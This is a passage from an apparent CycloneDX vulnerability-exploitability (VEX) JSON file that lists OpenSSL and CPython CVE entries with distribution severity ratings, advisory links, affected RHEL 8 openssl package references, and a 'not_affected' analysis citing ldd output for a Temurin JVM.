          "url": "https://ubuntu.com/security/notices/USN-7980-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-22795"
        }
      ],
      "published": "2026-01-27T16:16:35+00:00",
      "updated": "2026-06-17T10:20:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2026-22796",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        754
      ],
      "description": "Issue summary: A type confusion vulnerability exists in the signature\nverification of signed PKCS#7 data where an ASN1_TYPE union member is\naccessed without first validating the type, causing an invalid or NULL\npointer dereference when processing malformed PKCS#7 data.\n\nImpact summary: An application performing signature verification of PKCS#7\ndata or calling directly the PKCS7_digest_from_attributes() function can be\ncaused to dereference an invalid or NULL pointer when reading, resulting in\na Denial of Service.\n\nThe function PKCS7_digest_from_attributes() accesses the message digest attribute\nvalue without validating its type. When the type is not V_ASN1_OCTET_STRING,\nthis results in accessing invalid memory through the ASN1_TYPE union, causing\na crash.\n\nExploiting this vulnerability requires an attacker to provide a malformed\nsigned PKCS#7 to an application that verifies it. The impact of the\nexploit is just a Denial of Service, the PKCS7 API is legacy and applications\nshould be using the CMS API instead. For these reasons the issue was\nassessed as Low severity.\n\nThe FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,\nas the PKCS#7 parsing implementation is outside the OpenSSL FIPS module\nboundary.\n\nOpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-22796"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:1473"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-22796"
        },
        {
          "url": "https://bugzilla.redhat.com/2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/2430390"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430390"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-1473.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:1473"
        },
        {
          "url": "https://github.com/advisories/GHSA-r9hf-rxjm-gv2f"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/2502e7b7d4c0cf4f972a881641fe09edc67aeec4"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/572844beca95068394c916626a6d3a490f831a49"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7bbca05be55b129651d9df4bdb92becc45002c12"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/eeee3cbd4d682095ed431052f00403004596373e"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/ef2fb66ec571564d64d1c74a12e388a2a54d05d2"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-22796.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50081.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22796"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260127.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-22796"
        }
      ],
      "published": "2026-01-27T16:16:35+00:00",
      "updated": "2026-06-17T10:20:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2026-2297",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        668
      ],
      "description": "The import hook in CPython that handles legacy *.pyc files (SourcelessFileLoader) is incorrectly handled in FileLoader (a base class) and so does not use io.open_code() to read the .pyc files. sys.audit handlers for this audit event therefore do not fire.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-2297"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/05/6"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19064"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-2297"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
